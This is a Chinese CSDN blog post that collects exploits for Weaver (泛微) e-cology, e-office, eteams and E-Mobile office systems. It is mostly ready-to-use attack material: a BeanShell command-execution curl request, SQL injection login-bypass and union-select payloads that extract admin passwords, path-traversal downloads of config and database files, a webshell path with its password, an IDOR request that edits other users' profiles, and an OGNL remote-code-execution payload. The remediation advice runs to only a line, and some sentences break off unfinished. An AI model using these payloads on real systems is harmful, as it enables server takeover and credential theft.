php越权执行命令漏洞_泛微OA系统多版本存在命令执行漏洞

最新推荐文章于 2024-10-01 15:20:30 发布
最新推荐文章于 2024-10-01 15:20:30 发布
阅读量1.1k 收藏
点赞数
文章标签: php越权执行命令漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35327395/article/details/115104313
版权

0x01

泛微协同商务软件系统存在命令执行

0x02 漏洞危害

0x03 影响范围

泛微 e-cology<=9.0

0x04 漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

66b39cefea89699334f2cf28c29bb452.gif

66b39cefea89699334f2cf28c29bb452.gif

66b39cefea89699334f2cf28c29bb452.gif

0x05 poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev

al%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

泛微OA系统在

0x01 漏洞描述

攻击者可通过该漏洞页面直接获取到

0x02 影响范围

目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版

0x03漏洞复现

对这个漏洞要注意两点就是 ,获取密钥。默认密钥1z2x3c4v5b6n。使用密钥解密DES密文!这里使用python脚本自动完成这一步 脚本如下:

66b39cefea89699334f2cf28c29bb452.gif

66b39cefea89699334f2cf28c29bb452.gif

SQL注入

前台SQL注入

用户名:

admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a

密码: 1

验证页面参数 - loginid

(1)

/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=

(2)

/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=

未授权访问页面

//services/   存在注入

/ws/   存在注入

(3)

/weaver/weaver.file.SignatureDownLoad?markId=1  --参数markld

后台SQL注入

(1)

首先用使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

(2)

管理员情况下的注入:

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:http://127.0.0.1//cowork/CoworkLogView.jsp?id=151

普通用户注入地址:

http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址:

http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3

(3)

/list.do?module=2&scope=5#1

(4)

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

任意文件

测试链接 :

http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843

其中,参数 ATTACHMENT_NAME 未有效的控制其范围,导致任意文件

配置文件

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843

数据库连接文件下载

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843

文件上传

http://xx.xx.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)

数据库后台访问

http://xx.xx.cn:8028/

phpmyadmin/

认证缺陷-绕过登录限制进入后台

则可注入的网址为 http://xx.xx.cn:8028/building/urlurl.php 直接访问显示access denied,

使用hackbar。post内容中,url为general/index.php,smsid为注入sql,内容为1

union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',两者都经过DES3加密后再经过base64转码,点击excute...

数据库操作

/ws/query/

泛微eteams_oa系统越权修改任意用户信息

抓包得到一个链接:

https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509

这时候我们记住8005824116863355409这个东西

我们修改本用户资料处:

我们修改一下电话,然后抓包并且把里面的employee.id替换为8005824116863355409为:

url:https://www.eteams.cn/base/employee/saveProperty.json

postdata:

employee.id=8005824116863355409&propertyName=telephone&employee.telephone=test

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do

data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**:89/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

敏感文件泄露

/messager/users.data

/plugin/ewe/jsp/config.jsp

路径遍历

/plugin/ewe/admin/upload.jsp?id=11&dir=../../../

/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'

弗兰克邓
关注
E-office OA 平行越权漏洞复现
afei001
01-09 708
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。但泛微e-office OA系统存在漏洞还真不少。这个平行越权漏洞之前早就在乌云上爆出过了。 泛微E-office官网:w...
【1day】泛微e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 510
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1455
泛微OA
漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞
最新发布
qq_48368964的博客
10-01 1251
泛微OAE-Ofice do exce.php存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 2333
泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
泛微OA系统版本存在命令执行漏洞
Sylon的博客
10-30 1万+
0x01漏洞描述 泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本泛微OA上进行远程代码执行。 0x03影响范围 泛微 e-cology<=9.0 0x04漏洞复现 访问http://url/weaver/bsh.servlet.BshServlet...
软件漏洞-泛微OA-汇总
weixin_30855099的博客
09-20 3322
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
Web安全-泛微相关系统-历史漏洞
csjsz的博客
07-01 4933
2019年 泛微e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 泛微e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/ CNVD-2019-34241 /mobile/browser/WorkflowCenterT
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2114
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
2021HW行动漏洞披露和漏洞修复分析.zip
06-30
2021/04/08 金山V8/V9终端安全系统 金山 V8 -V9 终端安全系统漏洞合集 2021/04/08 金山V8终端安全系统 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 2021/04/08 天擎 天擎越权访问 2021/04/08 致远OA 致远OA ...
【文档留存】泛微OA &&POC
qq_35349673的博客
06-04 2131
sfdafasfasf
marvell_88se_91XX_92XX_sata_6g_1201047_whql.zip
03-15
蜜罐超存J1900 6SATA 驱动。解决只识别4SATA的问题。WIN10 1909亲测可用。(仅供windows平台使用)
泛微OA系统远程命令执行漏洞
chaojixiaojingang
08-21 5983
1.漏洞描述 泛微OA办公系统存在远程命令执行漏洞,由于泛微办公系统的Java Beanshell接口可被未授权,攻击者通过调用该Beanshell接口,构造特定的HTTP请求绕过泛微本身一些安全限制造成远程命令执行,获取服务器完全控制权限。 2.漏洞复现 1)访问泛微办公系统:http://xx.xx.140.21:8090/login/Login.jsp?logintype=1 2)在URL后添加/weaver/bsh.servlet.BshServlet,得到命令执行环境: ...
泛微OA检测工具-WeaverExploit_All(一)
siu~
08-16 1054
泛微最近的漏洞利用工具(PS:2023)
八、基本数据类型内置方法
liu_sir1009的博客
04-05 1万+
一、数据类型 1.1定义 # 1、定义: # 1.1 整型int的定义 age=10 # 本质age = int(10) # 1.2 浮点型float的定义 salary=3000.3 # 本质salary=float(3000.3) # 注意:名字+括号的意思就是调用某个功能,比如 # print(...)调用打印功能 # int(...)调用创建整型数据的功能 # float(...)调用创建浮点型数据的功能 1.2类型转换 # 1、数据类型转换 # 1.1 int可以将由纯整数构成的字符串直
【1day】复现泛微E-Mobile 6.6 存在命令执行漏洞
记录并分享学习安全的知识点..
08-14 2228
E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户打造的移动办公产品。E-Mobile 6.6 版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
爬取电影天堂
热门推荐
henusyb的博客
04-20 14万+
电影天堂爬虫之网页分析 from lxml import etree import requests BASE_DOMAIN = 'http://www.ygdy8.net' url = 'http://www.ygdy8.net/html/gndy/dyzz/index.html' headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10....
漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现
Summer's blog
05-13 1万+
目录 0x00前言 0x01漏洞描述 0x02漏洞复现 0x03漏洞POC 0x04影响范围 0x05漏洞防护 0x06免责声明 0x00前言 2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛...
泛微OA漏洞学习——E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
记录并分享学习安全的知识点..
07-10 1721
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行漏洞等级严重。......
泛微oa系统9.00漏洞复现
05-02
泛微OA是一款广泛使用的办公自动化软件,在其9.00版本中,存在一个漏洞漏洞编号为CVE-2021-29623,该漏洞允许攻击者未经身份验证就可以访问系统中的重要文件。攻击者可以通过向系统发送恶意请求,来获取管理员账户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值